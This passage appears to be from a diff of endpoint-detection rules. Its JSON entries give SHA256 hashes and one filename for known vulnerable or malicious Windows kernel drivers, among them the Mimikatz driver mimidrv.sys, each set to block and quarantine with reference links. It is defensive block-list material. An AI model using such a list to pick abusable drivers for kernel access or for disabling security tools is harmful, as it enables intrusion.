"2026-03-23T11:45:29.616711Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f9c290ffc007e94fb61aecff42d267c1e626ec7939025b1a7d7285441d1c490d", + "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "49b1d6a8-50bf-5d5b-83f9-a81ce874666d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.981093Z", + "creation_date": "2026-03-23T11:45:29.981096Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.981101Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c0ae3349ebaac9a99c47ec55d5f7de00dc03bd7c5cd15799bc00646d642aa8de", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "49bd1ec5-5af3-5f87-b261-9b4fea7c94df", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.484025Z", + "creation_date": "2026-03-23T11:45:31.484029Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.484038Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5339fb0bd4386b1c0606e67b43971737f2758983f745b772975ac04fcad7c6ff", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "49c6d95a-5d8d-5aa7-a881-6f13903df38d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.152603Z", + "creation_date": "2026-03-23T11:45:31.152605Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.152621Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"e32cf0b4a39994f1a269d04db6724b5d2561620a0a69ca9e0e9c8e77461ba959", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "49cf91f3-7f95-5919-9f88-573a2a808fba", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982590Z", + "creation_date": "2026-03-23T11:45:29.982592Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982598Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "954789c665098cf491a9bdf4e04886bad8992a393f91ccbca239bff40cc6dca6", + "comment": "Malicious Kernel Driver (aka daxin_blank5.sys) [https://www.loldrivers.io/drivers/0590655c-baa2-481a-b909-463534bd7a5e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "49e9e1a8-d3fd-5fef-aa68-c03650b99b6b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611481Z", + "creation_date": "2026-03-23T11:45:29.611483Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611488Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "16398965e9cea179b2e5ca884e3af032dece08d4ef33bdd83234ee441d71a5fa", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "49f7cb42-d428-552d-ac24-0675ceadd54c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619405Z", + "creation_date": "2026-03-23T11:45:29.619407Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619412Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ed68f30f8246730c2b57495ed1db1480350d879b01d070999d35f38630865f5c", + "comment": "Realtek vulnerable driver (aka rtkio64.sys, rtkiow10x64.sys and rtkiow8x64.sys) 
[https://github.com/blogresponder/Realtek-rtkio64-Windows-driver-privilege-escalation] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "49fa907d-46c3-5f32-ac96-4dc766ff34b3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607112Z", + "creation_date": "2026-03-23T11:45:29.607114Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607119Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "filename", + "value": "PROCEXP152.SYS", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "49fd9125-5efd-5e05-b079-f1e2d3104437", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612300Z", + "creation_date": "2026-03-23T11:45:29.612301Z", + "enabled": true, + "block_on_agent": true, + 
"quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612307Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1a4f7d7926efc3e3488758ce318246ea78a061bde759ec6c906ff005dd8213e5", + "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4a20e869-0796-5ca6-b994-d781bb8ef324", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831290Z", + "creation_date": "2026-03-23T11:45:30.831292Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831298Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "789854191b0b6550656d0f5f939fb8213ac3d7e32620fe794af66f529819a197", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4a3da3a0-1dec-5a35-ba5b-100979e858a1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610655Z", + "creation_date": "2026-03-23T11:45:29.610657Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610662Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "900dd68ccc72d73774a347b3290c4b6153ae496a81de722ebb043e2e99496f88", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4a492d3a-efd6-51b0-9877-4bc191f4e884", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142452Z", + "creation_date": "2026-03-23T11:45:31.142454Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142459Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0b112d137a73e931e1eac4d66d981cc5750e095741a97970bc37e4063b6edbc0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4a4a32c4-64ce-502b-be9c-7516978f4d6f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968648Z", + "creation_date": "2026-03-23T11:45:29.968651Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968656Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6521a35800da601f76fe2a8270f6cac17eb491535abf362669f4e2e6c8e155f7", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4a5ba789-a8da-5098-a952-17498fff2d31", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832606Z", + "creation_date": "2026-03-23T11:45:30.832608Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832613Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3d30609e8e3519fe199762adfc696ccccd9b685a7377ca18addd342c15fa28c6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4a65b4cf-74fe-5492-849f-706b49a8f0ff", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968686Z", + "creation_date": "2026-03-23T11:45:29.968688Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968694Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6fb5bc9c51f6872de116c7db8a2134461743908efc306373f6de59a0646c4f5d", + "comment": 
"Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4a6d894d-a175-5fbf-b094-963679cf16dd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.821106Z", + "creation_date": "2026-03-23T11:45:30.821109Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.821118Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "386745d23a841e1c768b5bdf052e0c79bb47245f9713ee64e2a63f330697f0c8", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4a6e72cd-c4a9-5f80-8082-15041d7ffcb4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606505Z", + 
"creation_date": "2026-03-23T11:45:29.606507Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606512Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fa959c48c055ec149d434a5adeb9f9938d1c260a65ee8a4ea1d67bfbdceab83f", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4a7b1e46-04f3-59d2-a30e-bdf5132eff22", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.471597Z", + "creation_date": "2026-03-23T11:45:31.471600Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.471609Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cb53959c71aa4cc446e6424b17440292c77d6c7fa88ce9503670a0a0cbe8ccb7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"4a89f099-894f-5d46-8871-bbed0765c18b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.981454Z", + "creation_date": "2026-03-23T11:45:29.981456Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.981462Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8bf01cd6d55502838853851703eb297ec71361fa9a0b088a30c2434f4d2bf9c6", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4a8c4c2d-8dee-5211-a23e-07344c9a4799", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.457689Z", + "creation_date": "2026-03-23T11:45:30.457693Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.457702Z", + 
"rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ed617d4c50288921a6a760de19db1633bd8172421109dcf68082c67db085ddb1", + "comment": "Vulnerable Kernel Driver (aka rtkio64.sys ) [https://www.loldrivers.io/drivers/8d3f27bd-c3fd-48d0-913a-e2caa6fbd025/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4a8d2828-2537-581c-bdfe-f4453f0201c8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.477461Z", + "creation_date": "2026-03-23T11:45:30.477464Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.477473Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "51480eebbbfb684149842c3e19a8ffbd3f71183c017e0c4bc6cf06aacf9c0292", + "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4a8d88c5-83f7-5be6-b948-034701a6b94d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.821217Z", + "creation_date": "2026-03-23T11:45:30.821220Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.821229Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "468b087a0901d7bd971ab564b03ded48c508840b1f9e5d233a7916d1da6d9bd5", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4a8e35bb-b29a-5e05-bdf6-58c86bee1328", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.471076Z", + "creation_date": "2026-03-23T11:45:30.471079Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.471088Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "785723a3afe96876382524a9e90984f379c41521cd1f86a2172314ad58785e4f", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) 
[https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4aae35d0-68bd-517a-bb7d-f2be35bb1a96", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618694Z", + "creation_date": "2026-03-23T11:45:29.618695Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618701Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1e1f20ceb2bfe9f38b50d6c997dbad032b2a79937ef6b3ce41b34bb74fbd24db", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4aaf35c8-e06b-5a48-9c23-80e82684ebfa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:29.985144Z", + "creation_date": "2026-03-23T11:45:29.985146Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985152Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f2b95fc91fe33c1995c49c35e32124ece7d958ed7d3b7a5f325f2a30454b9256", + "comment": "Dangerous Physmem Kernel Driver (aka HwRwDrv.Sys) [https://www.loldrivers.io/drivers/e4609b54-cb25-4433-a75a-7a17f43cec00/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4ab6ba8b-c8cf-5c3c-947f-b5e3a126accc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 